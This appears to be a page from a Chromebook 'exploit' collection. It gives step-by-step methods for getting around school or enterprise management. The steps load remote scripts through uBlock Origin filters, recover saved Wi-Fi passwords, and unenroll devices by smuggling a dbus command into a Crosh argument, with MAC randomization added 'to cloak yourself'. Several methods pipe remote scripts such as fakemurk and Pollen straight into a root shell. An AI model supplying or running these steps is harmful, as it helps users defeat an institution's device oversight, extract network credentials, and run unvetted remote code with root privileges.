1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it from "unset" to "https://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js".
3: Go to the “My filters” tab & add a line with “*##+js(execute_script.js)”, then run the code on the current page (Ctrl+Alt+~).
Requires Dev Mode, external storage device
Allows you to boot from an external storage device. See Shimboot for booting Linux from an external storage device
USBoot.mp4
1: Enable Dev Mode (Esc+Power+Refresh).
2: After selecting "boot from internal disk", press Ctrl+Alt+F2.
3: Type "sudo crossystem dev_boot_usb=1". Note that if the GBB flag that ignores this is set you can skip this step.
Press "Ctrl+U" on the OS Verification screen to boot from USB.
uBlock Origin exclusive
Unblocks bookmarklets. Updated version of uBlock Run.
Web-based exploit.
uRun.mp4
1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it to "https://inglan2.github.io/uRun/urun.js".
3: Go to the “My filters” tab & add a line with “*##+js(urun.js)”, then run the code on the current page (Ctrl+Alt+~).
Press "Ctrl+Shift+`" to open the menu, where you can run & create scripts. To add a script, click the ➕ button & enter the code without the "javascript:" part.
Only works with connected networks; Chrome OS exclusive
Gives the passwords to connected Wi-Fi networks from a .json file.
Web-based exploit.
PPT.mp4
1: Go to chrome://net-export.
2: Select "Include raw bytes" & start logging to disk.
3: Go to chrome://policy.
4: Click "Reload policies".
5: Go back to chrome://net-export & stop logging.
6: Go here or open this HTML file & upload the log file.
Requires Dev Mode
Gives you the password to a Wi-Fi network.
1: Enter Dev Mode & open Crosh (Ctrl+Alt+T).
2: Run the commands "shell", "sudo su", & "cd home/root", then type "ls" & copy the middle code string.
3: Run the command "cd [code string here]" & type "ls" again. Enter "more shill/shill.profile".
4: Enter "more shill/shill.profile".
5: Eventually, you’ll see a username appear. Scroll up in Crosh until you see the SSID (network ID). Copy the passphrase code (below the SSID & after the colon).
6: Run the command "echo [passphrase] | tr ‘!-~’ ‘P-~!-O’."
Patched on Chrome OS 101+
Unenrolls your Chromebook using Crosh.
Unenroll:
1: Open Crosh (Ctrl+Alt+T).
2: Run "set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\'"
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R).
4: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Re-enroll:
1: Open a bash shell & run "sudo -i", "vpd -i RW_VPD -s check_enrollment=1", "echo "fast safe" > /mnt/stateful_partition/factory_install_reset", & "reboot".
Requires Dev Mode; patched on version 117+
Allows you to have Dev Mode permissions while in Safe Mode. Succeeded by Murkmod
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4+, your Chromebook is unsupported.
4: Enter Dev Mode.
5: Go to chrome-untrusted://crosh & run the commands "shell", “sudo -i”, & “bash <(curl -SLk https://github.com/MercuryWorkshop/fakemurk/releases/latest/download/fakemurk.sh)”. Follow everything it says. If you get an error about a filesystem being readonly, run “fsck -f $(rootdev)” & reboot.
If you get stuck on the enrollment screen, enter Dev Mode with Ctrl+D, then press Refresh+Power & then space on the OS Verification screen. You will be on a “Chrome OS is missing or damaged” screen. Enter Dev Mode & when you get back to the OS verification screen press Ctrl+D to boot.
Don't use the sign out button as it will freeze your computer. Use Power+Refresh or Reboot in Crosh instead.
Mush will be installed with Fakemurk.
While Fakemurk is installed, you can make a folder called “disable-extensions” to disable extensions.
1: Open Crosh (Ctrl+Alt+T) & run the “vmc” command. If you get a list of subcommands, then continue.
2: Powerwash then sign in & disable Wi-Fi immediately.
3: Go to chrome://extensions & enable your internet, then immediately disable it when an extension is installed.
4: Open Crosh & for each extension you want to disable, run the command “vmc create-extra-disk --size 1 /home/chronos/user/Extensions/{extensionID}” or run "Open Crosh & type “vmc create-extra-disk --size 1 /home/chronos/user/Extensions”" to disable all.
5: Reenable Wi-Fi.
Requires Dev Mode; patched on Chrome OS 131+
Changes your Chromebook's policy.
Chrome OS-based exploit.
1: Enter Dev Mode (Esc+Power+Refresh) & open Crosh (Ctrl+Alt+T).
2: Run the following commands: “shell”, “sudo su”, & “curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash”.
A: If the policy doesn’t apply, press Alt+Vol Up+X.
3: Reboot, repeat steps 1 & 2, then run this command: "curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash".
